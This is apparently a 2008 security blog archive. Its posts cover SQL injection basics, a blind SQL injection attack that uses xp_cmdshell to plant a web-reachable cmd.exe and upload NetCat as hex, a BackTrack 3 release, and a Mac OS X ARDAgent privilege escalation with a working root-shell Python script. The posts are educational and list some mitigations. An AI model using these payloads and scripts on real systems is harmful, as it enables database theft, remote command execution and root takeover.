Archive for June, 2008

 

Back to Basics – SQL Injection

Jun 29, 2008 in Security

SQL Injection has been making news again lately. Even Microsoft, last Tuesday, released a Security Advisory explaining the Rise in SQL attacks. They stated:

Microsoft is aware of a recent escalation in a class of attacks targeting Web sites that use Microsoft ASP and ASP.NET technologies but do not follow best practices for secure Web application development. These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.”
http://www.microsoft.com/technet/security/advisory/954462.mspx

Even recent diaries on Sans.org, talked about the rise of SQL injections attacks. As a result to the Security Advisory, Microsoft also discussed the release of HP’s free SQL injection scanner. This can be found here:

https://download.spidynamics.com/Products/scrawlr/

There are a multitude of ways to protect against different types of SQL injections, but that’s another topic too long to discuss here. I think it’s better if we understand the basics to what exactly is an SQL injection.

Many websites are linked to backend databases that have a wealth of different information. Everything from credit card numbers to usernames and passwords. SQL queries are made from the website to this backend database to retreive certain information.

The possibility of compromise exists in the fact that a crafted request could allow an attacker to retrieve more information that he was intended to see.

These vulnerabilities could be located in numerous places. Everything from search boxes, login areas, or vulnerable areas that make requests for information. These pages generally are pages that have ASP, JSP, CGI, or PHP extensions.

An example of an SQL injection attack would be:

Making the login username: X’ OR 1=1– and the password X’ OR 1=1–
or Changing the URL to request http://website.c0m/index.asp?id=X’ or 1=1–

To further explain the details of what this is doing we need to break it down.

  • The X is just a dummy place holder.
  • The tick after the X is to close the original username statement. If you think about it in code, the username requires some field and again in thinking in code, username encompasses that request inside two ticks (one before the username and one after. eg ‘testuser’). By putting X’ in the username it forces the userfield to close the request early and this is where the exploit lies.
  • Once we close off the username field prematurely, we can add anything else we want in this field.
  • Now we need to understand what we are doing with the 1=1. Again if we think in code, 1=1 is a true statement. So we are saying that the username should be either X OR true. X OR true, will always result in true and say that the user will be any user from the user’s table.
  • Lastly we use the — to comment all the rest of the code out. And we do the same thing for the password field.
  • Now remember there are a slew of different variations of sql injections that could work dependent on database, version, proxies, and etc. So one might not work but another may.

So once we have successfully logged in or found that a site is susceptible to SQL injections, the fun can begin. You can make regular sql requests such as:

http://website.c0m/index.asp?id=X’ 10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

Which could present all the information about all the tables on the server. The possibilities are endless…

Secure Planet WIKI should be up soon. http://securepla.net/wiki

-Cheetz

The Blind Can See – Blind SQL Injection

Jun 26, 2008 in Security

Every so often, you might run into a site that might be vulnerable to a SQL injection attack, but without error or debug responses, we don’t know if it’s successful. I stumbled across a good white paper that describes blind sql injection and what can be done to mitigate it.

First off, it is important to understand the Microsoft Store Procedure called xp_cmdshell. This procedure is used to run arbitrary commands on the database server and essentially gives an attacker command line access to the system in the context of the user the database is running as.

Example of xp_cmdshell being used:
2008-04-11 10:29:40 x.x.x.x/xxx.asp
xxx=a’;drop+table+tmp3+create+table+tmp3(a+int+identity,b+varcha
r(8000))+insert+into+tmp3+exec+master..xp_cmdshell+’ipconfig+/all

How the attack works is that we pipes commands via the xp_cmdshell to create a vbs script. It takes the script below and compiles it into an executable script called secret.

Set WshShell = WScript.CreateObject(“WScript.Shell”)
Set ObjExec = WshShell.Exec(“cmd.exe /c echo %windir%”)
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject(“IIS://LocalHost/W3SVC/1/ROOT”)
Set Dir = Root.Create(“IIsWebVirtualDir”, “secret”)
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo

This is done by using the xp_cmdshell in this fashion:

http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ‘ Set WshShell =
WScript.CreateObject(“WScript.Shell”) > c:\secret.vbs’
…..
…..
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ‘ Dir.SetInfo
>> c:\secret.vbs

Once the file is complete, we use the xp_cmdshell to run the vbs script.
http://target/details.asp?id=1;exec+master..xp_cmdshell+’cscript+c:\secret.vbs’

And finally:

Run command over HTTP/HTTPS
http://target/secret/system32/cmd.exe?+/c+set

This gives you full access to the system32 binaries. From here, the possibilities are endless.

The white paper is found below:

http://www.net-security.org/dl/articles/blindsql.pdf

Another option is to try to break up the file into hex and try to store that in the database. From a Mandiant seminar I went to, an attacker broke NetCat down into hex and stored it in the database.

2008-02-14 21:14:35 x.x.x.x/xxx.asp
xxx=a’;IF+NOT+EXISTS(SELECT+b+from+tmp3+where+a=0)+insert+into+tm
p3+values+(0,0x4d5a50000200000004000f00ffff0000b8000000000000004000
1a000000000000000000000000000000000000000000000000000000000000
00000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f67
72616d206d7573742062652072756e20756e6465722057696e33320d0a2437
00000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
000000000000000000000000)–

After all parts of the file were uploaded, the file was reconstructed using the following

2008-02-14 21:15:51 x.x.x.x/xxx/xxx.asp
xxx=a’;drop+table+tmp3+create+table+tmp3
(a+int+identity,b+varchar(8000))+insert+into+tmp3+exec+master..xp_
cmdshell+’bcp+”select+b+from+XXX..tmp3″+queryout+c:\nc.exe+-T+-
i+c:\nc.in’–

Again once this was complete, you would try to use the xp_cmdshell to execute nc.exe. There is no one solution to SQL Injection attacks, but the most common are:

  • Disable xp_ and sp_ procedures (disable all unnecessary procedures
  • Disable xp_cmdshell and dll associated with it (Xplog70.dll)
  • Run service user and sql user as a unprivileged user
  • And Patch!

-Cheetz

BackTrack 3

Jun 23, 2008 in Security

The final version of BackTrack 3 has been released!!! For those who don’t know what BackTrack is, it is a Live Security Distro (based off of Slax) that contains a huge list of different security tools. Covering everything from the 16 categories:

* Enumeration
* Exploit Archives
* Scanners
* Password Attacks
* Fuzzers
* Spoofing
* Sniffers
* Tunneling
* Wireless Tools
* Bluetooth
* Cisco Tools
* Database Tools
* Forensic Tools
* BackTrack Services
* Reversing
* Misc

http://www.remote-exploit.org/backtrack_download.html

A pretty complete package of tools to be used as a Live CD, bootable USB drive, or VMware image. From what I have heard, the VMWare image works nicely even through Windows, without all the previous driver issues with older versions.

More to come once I get to play with it a little more.

-Cheetz

Apple’s Local Privilege Escalation with ARDAgent on Mac OS X 10.4 and 10.5

Jun 21, 2008 in Security

So an Apple’s exploit has been making its run around the internet. Pretty much a vulnerable ARDagent (or Apple Remote Desktop Agent) allows most Mac OS X 10.4 and 10.5 to be exploited with a local privilege escalation.

osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘;

Above is a demo of what the exploit can do. OSAScript or Open Scripting Architecture Script, is running the ARDAgent to do a whoami. This returns: root.

From here the possibilities are endless.

#!/usr/bin/python
import commands
payload=”echo ‘int main() { setuid(0); setgid(0); seteuid(0); system(\”/bin/sh -i\”); }’ > /tmp/r00t.c”
buildcmd=”gcc /tmp/r00t.c -o /tmp/r00ted”
escalate=”osascript -e ‘tell app \”ARDAgent\” to do shell script \
\”chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\”‘”
print ‘Building your shell’, commands.getoutput(payload), commands.getoutput(buildcmd)
print commands.getoutput(escalate)

print “r00t is located at /tmp/r00ted”

Now a quick python script runs the exploit and create a shell running as root. I have also seen numerous extensions of this found here: http://www.macshadows.com/forums/index.php?showtopic=8640&st=460 to pretty much create NC and VNC backdoors and some of them will even make your Mac take random pictures with the built in camera.

Haven’t seen a fix from Apple yet, but as a immediate work around, you could always remove Apples Remote Desktop.

Update: There have been some talks about this being exploited remotely, such as through SSH, but from this might only result in a DoS of the system without being logged in the console.

-Cheetz

Very First Post

Jun 17, 2008 in Security

And much more to come.

-Cheetz